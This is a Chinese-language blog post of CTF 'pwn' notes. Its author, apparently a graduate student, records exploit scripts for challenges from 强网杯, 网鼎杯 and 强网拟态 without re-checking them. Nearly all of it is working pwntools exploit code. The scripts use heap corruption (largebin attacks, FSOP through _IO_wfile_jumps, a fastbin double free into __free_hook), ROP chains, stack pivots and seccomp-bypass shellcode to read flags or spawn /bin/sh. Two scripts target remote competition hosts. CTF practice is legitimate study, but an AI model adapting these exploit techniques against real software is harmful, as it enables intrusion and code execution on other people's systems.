pwn手记录题3

前言：研究生的生活很充实（忙，大概三年我再也没有时间去认真做题了
以下是最近比赛的遇到的题目。仅记录脚本，细节不会再核实了（没时间(;´༎ຶД༎ຶ`)）

可能以后不太会触碰CTF比赛了

---

强网杯-baby_heap

from pwn import *
context(os='linux', arch='amd64', log_level='debug')

binary = './pwn'
r = process(binary)
elf = ELF(binary)
libc = elf.libc

def bug(exp = ''):
    attach(r)
    pause()
menu = lambda x : r.sendlineafter("your choice: \n", str(x))
exit = lambda : menu(6)
def add(size): # 0x500
    menu(1)
    r.sendlineafter("your commodity size \n", str(size))
def free(idx):
    menu(2)
    r.sendlineafter("which to delete: \n", str(idx))
def edit(idx, content):
    menu(3)
    r.sendlineafter("which to edit: \n", str(idx))
    r.sendafter("content \n", content)
def show(idx):
    menu(4)
    r.sendlineafter("which to show: \n", str(idx))
def env(idx):
    menu(5)
    r.sendlineafter("will be sad !\n", str(idx))
def Exit(pay1, pay2):
    exit()
    r.sendafter("Input your target addr \n", pay1)
    r.send(pay2)


add(0x568) # 1
add(0x558) # 2
add(0x558) # 3
free(1)
add(0x578) # 4
show(1)
r.recvuntil("content is here \n") # leak
libc_base = u64(r.recv(8)) - 0x21B120
heap_base = u64(r.recv(16)[8:]) - 0x1950
io_list_all = libc_base + libc.sym['_IO_list_all']
jump_table = libc_base + 0x216F40 # libc.sym['_IO_wfile_jumps']
setcontext = libc_base + libc.sym['setcontext']
mprotect = libc_base + libc.sym['mprotect']
mmap = libc_base + libc.sym['mmap']
ret         = libc_base + next(libc.search(asm('ret'), executable=True))
pop_rdi_ret = libc_base + next(libc.search(asm('pop rdi;ret')))
pop_rsi_ret = libc_base + next(libc.search(asm('pop rsi;ret')))
pop_rcx_ret = libc_base + next(libc.search(asm('pop rcx;ret')))
#pop_rdx_ret = libc_base + next(libc.search(asm('pop rdx;ret'), executable=True))

shellcode = asm('''
    mov rax, 0x67616c66
    push rax
    xor rdi, rdi
    sub rdi, 100
    mov rsi, rsp
    push 0
    push 0
    push 0
    mov rdx, rsp
    mov r10, 0x18
    push 437
    pop rax
    syscall
''') + asm(shellcraft.read(3, heap_base, 0x100)) + asm(shellcraft.write(1, heap_base, 0x100))

_lock = heap_base
_wide_data = heap_base + 0x1950 + 0x110
_wide_vtable = heap_base + 0x1950 + 0x110 + 0x100
stack = heap_base + 0x1950 + 0x100 + 0x100 + 0x68 + 0x18
payload = p64(0)*3 + p64(io_list_all-0x20)
pauload = payload.ljust(0x88-0x10, b'\x00') + p64(_lock) # _wide_data
payload = payload.ljust(0xa0-0x10, b'\x00') + p64(_wide_data) # _wide_data
payload = payload.ljust(0xd8-0x10, b'\x00') + p64(jump_table) # vtable
payload = payload.ljust(0x100+0x88, b'\x00') + p64(7) # rdx
payload = payload.ljust(0x100+0xa0, b'\x00') + p64(stack) + p64(ret) # rsp rip
payload = payload.ljust(0x100 + 0xe0, b'\x00') + p64(_wide_vtable) # _wide_vtable
payload = payload.ljust(0x100 + 0x100+0x68, b'\x00') + p64(setcontext + 61) # call [rax+0x68]
payload += p64(pop_rdi_ret) + p64(heap_base) + p64(pop_rsi_ret) + p64(0x5000) + p64(mprotect)
payload += p64(heap_base+0x1c00) + shellcode
edit(1, payload)
# _IO_wfile_overflow -> _IO_wdoallocbuf
free(3)
add(0x548) # 5 io_list_all = chunk_1
success("libc_base -> " + hex(libc_base))
success("heap_base -> " + hex(heap_base))
#bug('b _IO_flush_all_lockp')
menu(3) # exit
# payload = asm("mov rsp,0x04050000;push 0x23;push 0x04000050;retfq;", arch='amd64', bits=64).ljust(0x50, b'\x90')
# payload += asm("mov edx,0;mov esi,0;mov edi,0x04000150;mov eax,11;int 0x80;", arch='i386', bits=32).ljust(0x100, b'\x90') + b'/bin/sh\x00'
# r.send(payload)

r.interactive()
'''
WeIcame t0 :) 's Sh@p !
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x07 0xc000003e  if (A != ARCH_X86_64) goto 0009
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005
 0004: 0x15 0x00 0x04 0xffffffff  if (A != 0xffffffff) goto 0009
 0005: 0x15 0x03 0x00 0x00000002  if (A == open) goto 0009
 0006: 0x15 0x02 0x00 0x0000003b  if (A == execve) goto 0009
 0007: 0x15 0x01 0x00 0x00000101  if (A == openat) goto 0009
 0008: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0009: 0x06 0x00 0x00 0x00000000  return KILL
'''

24网鼎青龙-PWN04

from pwn import *
context(os='linux', arch='amd64', log_level='debug')

binary = './pwn'
r = process(binary)
elf = ELF(binary)
libc = elf.libc

def bug(exp=""):
    attach(r, exp)
    pause()

def burp():
    r.sendlineafter("your username:\n", 'admin')
    r.sendlineafter("your password:\n", '123456')

menu = lambda x : r.sendlineafter("> ", str(x))
def add(idx, size, payload):
    menu(1)
    r.sendlineafter("Input the key: \n", str(idx))
    r.sendlineafter("Input the value size: \n", str(size))
    r.sendlineafter("Input the value: \n", payload)
def show(idx):
    menu(2)
    r.sendlineafter("Input the key: \n", str(idx))
def free(idx):
    menu(3)
    r.sendlineafter("Input the key: \n", str(idx))
def edit(idx, payload):
    menu(4)
    r.sendlineafter("Input the key: \n", str(idx))
    r.sendlineafter("Input the value: \n", payload)

def table():
    secret = "s4cur1ty_p4ssw0rd"
    slen = len(secret)
    bss = list()
    v8 = list()
    v7 = 0
    for i in range(256):
        bss.append(i);
        v8.append(ord(secret[i % slen]))
    for j in range(256):
        v7 = (v8[j] + v7 + bss[j]) % 256
        v4 = bss[j]
        bss[j] = bss[v7]
        bss[v7] = v4
    return bss
def crypto(content, chunk, size):
    v5 = 0
    v6 = 0
    for i in range(size):
        v5 = (v5 + 1) % 256
        v6 = (v6 + content[v5]) % 256
        v4 = content[v5]
        content[v5] = content[v6]
        content[v6] = v4
        chunk[i] ^= content[(content[v5] + content[v6]) % 256]
    return content, chunk

burp() # 0x0000000000203088
add(0, 0x77, b'a'*0x20)
free(0)
show(0)
r.recvuntil(b'[key,value] = [0,') # leak heap address
chunk = r.recvuntil(b']\nEncrypt')[:-9]
_,heap_tmp = crypto(table(), list(chunk), 0x77)
heap_base = u64(bytes(heap_tmp[0:6]).ljust(8, b'\x00')) - 0xc70

for i in range(10):
    add(i, 0x97 ,b'b'*0x7)
for i in range(9):
    free(i)
show(7)
r.recvuntil(b'[key,value] = [7,') # leak libc address
chunk = r.recvuntil(b']\nEncrypt')[:-9]
_,libc_tmp = crypto(table(), list(chunk), 0x97)
libc_base = u64(bytes(libc_tmp[0:6]).ljust(8, b'\x00')) - 0x3EBCA0
malloc_hook = libc_base + libc.sym['__malloc_hook']
free_hook = libc_base + libc.sym['__free_hook']
set_context = libc_base + libc.sym['setcontext']
pop_rdi_ret = libc_base + next(libc.search(asm('pop rdi;ret')))
pop_rsi_ret = libc_base + next(libc.search(asm('pop rsi;ret')))
pop_rdx_ret = libc_base + next(libc.search(asm('pop rdx;ret')))
open_ = libc_base + libc.sym['open']
read_ = libc_base + libc.sym['read']
write_= libc_base + libc.sym['write']

for i in range(10):
    add(i, 0x67, b'c'*0x7)
for i in range(9):
    free(i)
free(7) # fastbins: 7 -> 8 -> 7
for i in range(7):
    add(i, 0x67, b'c'*0x7)
add(9, 0x67, b'c'*0x7)
payload = p64(free_hook) + p64(heap_base+0x10)
_,c_pay = crypto(table(), list(payload.ljust(0x67, b'\x00')), 0x67)
edit(9, bytes(c_pay))

add(0, 0x67, b'd')
add(1, 0x67, b'd')
add(2, 0x67, b'd')
payload = p64(set_context + 53) #  free_hook
_,c_pay = crypto(table(), list(payload.ljust(0x67, b'\x00')), 0x67)
edit(2, bytes(c_pay))
payload = p64(0)*6 + p64(heap_base+0x0678) + p64(pop_rdi_ret+1) # rsp rip
_,c_pay = crypto(table(), list(payload.ljust(0x67, b'\x00')), 0x67)
edit(9, bytes(c_pay)) # setcontext rdi

add(10, 0xe0, b'd')
payload = p64(0) + p64(pop_rdi_ret) + p64(heap_base+0x720) + p64(pop_rsi_ret) + p64(0) + p64(pop_rdx_ret) + p64(0) + p64(open_)
payload += p64(pop_rdi_ret) + p64(3) + p64(pop_rsi_ret) + p64(heap_base) + p64(pop_rdx_ret) + p64(0x30) + p64(read_)
payload += p64(pop_rdi_ret) + p64(1) + p64(pop_rsi_ret) + p64(heap_base) + p64(pop_rdx_ret) + p64(0x30) + p64(write_)
payload += b'flag\x00\x00\x00\x00'
_,c_pay = crypto(table(), list(payload.ljust(0xe0, b'\x00')), 0xe0)
edit(10, bytes(c_pay)) # orw
success("heap_base -> " + hex(heap_base))
success("libc_base -> " + hex(libc_base))
success("__free_hook -> " + hex(free_hook))
#bug("b free") # 0x0000000000203088
free(3)

r.interactive()

24网鼎青龙-PWN02

from pwn import *
context(os='linux', arch='i386', log_level='debug')

binary = './short'
#r = process(binary)
r = remote("0192d5dcf9d3782fa40c5102b405bdcc.48vx.dg02.ciihw.cn", 44805)
vuln = 0x08048611
leave_ret = 0x08048674
bin_sh = 0x0804A038
gift = 0x080485E6
bss_addr = 0x804a000 + 0x600
def bug():
    attach(r)
    pause()

r.sendlineafter("Enter your username: ", 'admin')
r.sendlineafter("Enter your password: ", 'admin123')
payload = b'a'*0x50 + p32(bss_addr+0x300) + p32(0x08048660)
#bug()
r.sendafter("your msg:\n", payload)
payload = p32(bin_sh) + p32(0x080485FF) + p32(0x0804A038) + b'b'*(0x50-0x8-0x4) + p32(bss_addr+0x300-0x50) + p32(leave_ret)
r.send(payload)

r.interactive()

24网鼎青龙-REVERSE02

import base64
from Crypto.Cipher import AES

s2 = [98,202,200,108,106,104,0xca,0xc8]
for i in s2:
    print(chr(i//2),end='') # 1ed654ed
print()
v21 = "XorrLord"
v11 = [106,14,23,70,117,11,65,6]
for i in range(len(v11)):
    t = ord(v21[i])^v11[i]
    print(chr(t),end='') # 2ae49d3b
print()

v10 = "Ajc2AYK2Bjg=="
a = base64.b64decode(v10.encode('utf-8')) # 需要指定码表
print(a) # b76ab6f8

ser = "AesMasterAesMast"
key = ser[:16].encode('utf-8')
v4 = [0xd5,0xe4,0xed,116,0xb2,0x82,0x81,35,79,0x87,0xe8,58,31,0xb9,0xcd,121]
ciphertext = bytearray(v4) # 0f0ccb65

# wdflag{1ed654ed2ae49d3bb76ab6f80f0ccb65}
cipher = AES.new(key, AES.MODE_ECB)
decrypted_data = cipher.decrypt(ciphertext)
print(decrypted_data)

24强网拟态-signin

from pwn import *
from ctypes import *
context(log_level='debug',os='linux',arch='amd64')

binary = './vuln'
#r = process(binary)
r = remote("pwn-f8599babd8.challenge.xctf.org.cn", 9999, ssl=True)
elf = ELF(binary)
libc = ELF('./libc.so.6')
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
main = 0x000000000040177B
bss_addr = 0x00000000004040A0 + 0xc0
pop_rdi = 0x0000000000401893 #: pop rdi ; ret
ret = 0x000000000040101a #: ret
leave_ret = 0x4013ee

def bug(exp = ''):
    attach(r,exp)
    pause()

def auth():
    name = b'a' * 18
    r.send(name)
    # srand
    libc = CDLL("./libc.so.6")
    libc.srand(0x61616161)
    for i in range(100):
        num = libc.rand() % 100 + 1
        r.sendafter("code:\n", chr(num) )

menu = lambda idx : r.sendafter(">> \n", idx)
show = lambda : menu(b'\x04')
def add(idx, heap='heap', stack='stack'):
    menu(b'\x01')
    r.sendafter("Index: \n", idx)
    r.sendafter("Note: \n", heap)
    sleep(0.3)
    r.send(stack)

def delete(idx):
    menu(b'\x02')
    r.sendafter("Index: \n", idx)


auth()
#bug('b *0x000000000040154B')
payload = b'a'*0x108 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main)
add(b'\x00', b'a'*0x100, payload)
puts_addr = u64(r.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
libc_base = puts_addr - libc.symbols['puts']
open_addr = libc_base + libc.symbols['open']
read_addr = libc_base + libc.symbols['read']
write_addr = libc_base + libc.symbols['write']
pop_rdx = libc_base + 0x0000000000142c92 #: pop rdx ; ret
pop_rsi = libc_base + 0x000000000002601f #: pop rsi ; ret

auth()
#bug('b *0x000000000040154B')
success("libc_base -> " + hex(libc_base))
success("puts_addr -> " + hex(puts_addr))
payload1 = b'./flag\x00\x00'
payload1 += p64(pop_rdi) + p64(bss_addr) + p64(pop_rsi) + p64(0) + p64(pop_rdx) + p64(0) + p64(open_addr)
payload1 += p64(pop_rdi) + p64(3) + p64(pop_rsi) + p64(bss_addr-0x30) + p64(pop_rdx) + p64(0x30) + p64(read_addr)
payload1 += p64(pop_rdi) + p64(1) + p64(pop_rsi) + p64(bss_addr-0x30) + p64(pop_rdx) + p64(0x30) + p64(write_addr) + p64(main)
payload2 = b'b'*0x108 + p64(pop_rsi) + p64(bss_addr) + p64(read_addr) + p64(0x00000000004014E6)
add(b'\x00', b'a'*0x100, payload2)
r.send(payload1)

#bug('b *0x4013e8')
payload = b'a'*0x100 + p64(bss_addr) + p64(leave_ret)
r.sendafter("Index: \n", b'\x00')
r.sendafter("Note: \n", b'a'*0x100)
sleep(0.3)
r.send(payload)


r.interactive()

24强网拟态-guest_book

from pwn import *
context(arch='amd64', os='linux', log_level='debug')

binary = './pwn'
r = process(binary)
elf = ELF(binary)
libc = elf.libc

def bug(exp = ''):
    attach(r, exp)
    pause()
menu = lambda x : r.sendlineafter(">", str(x))
exit = lambda : menu(5)
def add(idx, size = 0x508):
    menu(1)
    r.sendlineafter("index\n", str(idx))
    r.sendlineafter("size\n", str(size))
def edit(idx, content):
    menu(2)
    r.sendlineafter("index\n", str(idx))
    r.sendafter("content\n", content)
def free(idx):
    menu(3)
    r.sendlineafter("index\n", str(idx))
def view(idx):
    menu(4)
    r.sendlineafter("index\n", str(idx))


add(0)
add(1)
add(2)
add(3)
free(0)
free(2)
view(0) # leak libc
libc_base = u64(r.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - 0x21ACE0
view(2) # leak heap
heap_base = u64(r.recv(6).ljust(8, b'\x00')) - 0x290
free(1)
free(3) # ==========================
io_list_all = libc_base + libc.sym['_IO_list_all']
wfile = libc_base + libc.sym['_IO_wfile_jumps']

#bug()
add(0, 0x510)
add(1)
add(2)
add(3)
free(0) # chunk0 -> unsortbin
free(2) # chunk2 -> unsortbin
add(2)  # cnunk0 -> largebin
free(2)
payload = p64(0)*3+p64(io_list_all-0x20)
edit(0, payload)
add(4, 0x550) # io_list_all -> idx 2
# fake io =======================
lock = heap_base + 0x2a0
setcontext = libc_base + libc.sym['setcontext']
system = libc_base + libc.sym['system']
vtable = libc_base + libc.sym['_IO_wfile_jumps']
payload = p64(0)*2 + p64(heap_base+0x300) + p64(heap_base+0x301)*5
payload += p64(0)*3 + p64(heap_base+0x300) # _chain
payload += p64(2) + p64(0) + p64(0) + p64(heap_base+0x300) # _lock
payload += p64(0) + p64(0) + p64(heap_base + 0xda0) # _wide_data _IO_wide_data_2
payload += p64(0)*6 + p64(vtable)
# _IO_wide_data_2 0xda0
payload += p64(0)*3 + p64(0) + p64(heap_base+0x310) # _IO_write_base _IO_write_ptr
payload += (p64(0)*8 + p64(heap_base+0xea8) + p64(0)*6 + p64(heap_base+0xea8) + p64(system)
            + p64(0)*6 + p64(heap_base+0xe90-0x60))
payload += p64(0) + p64(0) + p64(setcontext+61)
payload += p64(system) + b'/bin/sh\x00'
edit(2, payload)
edit(1, b'\x00'*0x500 + b'\x00 sh\x00\x00\x00\x00')
success("libc_base -> " + hex(libc_base))
success("heap_base -> " + hex(heap_base))
success("io_list_all -> " + hex(io_list_all))
bug('b _IO_wdoallocbuf') #  _IO_flush_all_lockp  _IO_wfile_overflow
# p *(struct _IO_wide_data*)
exit()

r.interactive()